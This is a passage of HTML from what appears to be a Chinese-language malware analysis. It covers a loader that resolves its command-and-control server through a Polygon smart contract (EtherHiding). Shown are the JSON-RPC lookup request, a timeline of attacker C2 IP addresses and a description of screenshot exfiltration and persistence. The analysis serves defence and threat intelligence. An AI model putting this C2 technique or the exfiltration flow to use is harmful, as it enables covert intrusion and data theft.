rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">模块</span></p></th><th data-colwidth="99" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">参数数量</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主要职责</span></p></th></tr></thead><tbody><tr><td data-colwidth="138" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ptd.txt</span></code></td><td data-colwidth="99" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">   25</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">初始加载器：PEB 遍历、API 解析、截图采集、热补丁获取</span></p></td></tr><tr><td data-colwidth="138" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">decrypted_7.bin</span></code></td><td data-colwidth="99" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">   24</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">热补丁：区块链 C2 查询、C2 地址解析、再次截图上传、状态管理与持久化</span></p></td></tr></tbody></table></p><h4 data-line="330" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">3.1 隐蔽通信：EtherHiding 区块链 C2 寻址</span></h4><p data-line="332" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">热补丁执行后的第一个动作，是向 Polygon 主网的智能合约发送 JSON-RPC 查询，动态解析当前活跃的 C2 地址：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">json</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="json" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">{</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;jsonrpc&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;2.0&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;method&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;eth_call&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;params&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">[</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">{</span></span><span leaf="">&#34;to&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;0x1823A9a0Ec8e0C25dD957D0841e3D41a4474bAdc&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span><span leaf="">&#34;data&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;0x3bc5de30&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">}</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;latest&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">]</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;id&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">}</span></span></p></code></pre></div><p data-line="343" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过调用合约的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">getData()</span></code><span leaf=""> 方法（选择器 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x3bc5de30</span></code><span leaf="">，即 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">getData()</span></code><span leaf=""> 函数的 ABI 编码），对 ABI 编码的返回值进行 Hex 解码，即可得到当前活跃的 C2 URL（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://89.169.12.241" target="_blank">http://89.169.12.241</a></span></code><span leaf="">）。通过查询 PolygonScan 对合约 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x1823A9a0Ec8e0C25dD957D0841e3D41a4474bAdc</span></code><span leaf=""> 的链上交易记录，我们还原了攻击者自 2025 年 11 月上线以来的完整 C2 更新历史（截至本文发稿时 2026 年 3 月）。该合约由攻击者钱包 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0xdE275aD3...00c9716f2</span></code><span leaf=""> 独家控制，通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Update Data</span></code><span leaf=""> 方法频繁更改 C2 路由：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);width:543px;"><thead><tr><th data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">日期</span></p></th><th data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">区块高度</span></p></th><th data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">交易哈希（简写）</span></p></th><th data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">C2 URL</span></p></th><th data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">操作 / 备注</span></p></th></tr></thead><tbody><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2025 年 11 月 16 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">79088858</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0xd7dc3ffac5...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://127.0.0.1" target="_blank">http://127.0.0.1</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">基础设施初始调试 / 占位</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2025 年 11 月 16 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">79094009</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x54136d57aa...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://93.123.39.74" target="_blank">http://93.123.39.74</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">首次上线真实 C2 服务器</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2025 年 12 月 11 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">80187891</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x0267c7b110...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://84.21.189.135" target="_blank">http://84.21.189.135</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">常规基础设施轮换</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2025 年 12 月 22 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">80643053</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0xc913641b80...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://78.40.209.225" target="_blank">http://78.40.209.225</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">基础设施更新</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2025 年 12 月 27 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">80875834</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x00101ee1c9...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://151.243.113.70" target="_blank">http://151.243.113.70</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">密集节点轮换</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026 年 1 月 1 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">81084302</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x5f7e86206b...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://144.31.219.15" target="_blank">http://144.31.219.15</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">密集节点轮换，推测遭封禁或扫描</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026 年 1 月 26 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">82145758</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0xf483c98904...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://213.176.72.204" target="_blank">http://213.176.72.204</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">基础设施更新</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026 年 2 月 8 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">82731064</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x6423eee085...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://89.169.12.160" target="_blank">http://89.169.12.160</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">基础设施更新</span></p></td></tr><tr><td data-colwidth="179" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026 年 2 月 27 日</span></strong></td><td data-colwidth="81" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">83550809</span></p></td><td data-colwidth="98" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x1fc1320206...</span></code></td><td data-colwidth="102" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://89.169.12.241" target="_blank">http://89.169.12.241</a></span></code></td><td data-colwidth="83" align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">最近一次活跃操作，分析时当前使用的 C2</span></p></td></tr></tbody></table></p><p data-line="357" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">活动态势分析</span></strong><span leaf="">：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">基础设施快速迭代</span></strong><span leaf="">：从 2025 年 11 月 16 日上线至今，4 个月内完成 9 次 C2 更新。尤其是 2025 年 12 月 22 日至 2026 年 1 月 1 日的 10 天窗口内，攻击者连续切换了 4 个不同的服务器 IP——这一密集轮换节奏，与安全厂商对该基础设施的集中扫描封堵时间高度吻合。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">早期调试痕迹</span></strong><span leaf="">：首笔交易（2025 年 11 月 16 日）指向 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="http://127.0.0.1" target="_blank">http://127.0.0.1</a></span></code><span leaf="">，为典型的开发期本地调试占位行为，证实攻击者在正式上线前已在链上完成了功能性验证。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">服务器特征</span></strong><span leaf="">：当前 C2（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">89.169.12.241</span></code><span leaf="">）对常规 GET 请求返回 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">405 Method Not Allowed</span></code><span leaf="">，严格过滤非法流量，仅允许携带特定格式参数的 POST 请求通过。</span></p></li></ol><p data-line="363" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这张时间线表格的意义不仅在于还原攻击者的活跃态势——它证明了传统 IP 黑名单策略的根本性失效。每一次区块链上的单笔交易，就能让防御方数周积累的封堵规则瞬间归零。只要 Polygon 主网存在，这套 C2 基础设施就永远无法被彻底摧毁。</span></p><h4 data-line="365" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">3.2 双模式状态机：选择性投递与持久化驻留</span></h4><p data-line="367" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">热补丁实现了基于本地状态文件的</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">双模式执行逻辑</span></strong><span leaf="">，用于区分首次运行和后续运行：</span></p><p data-line="369" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">双模式执行逻辑</span></strong><span leaf="">：</span></p><p data-line="371" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Mode 1（首次运行，状态文件不存在）</span></strong><span leaf="">：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">查询 Polygon 区块链 → 解析 C2 地址</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">连接 C2，上传截图 + bot_info（multipart，约 6.2MB）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">收到 C2 响应（297KB 热补丁代码）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">io.open(&#34;{MachineGuid}.json&#34;, &#34;wb&#34;)</span></code><span leaf=""> → 写入状态文件 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">{status=&#34;ok&#34;}</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span 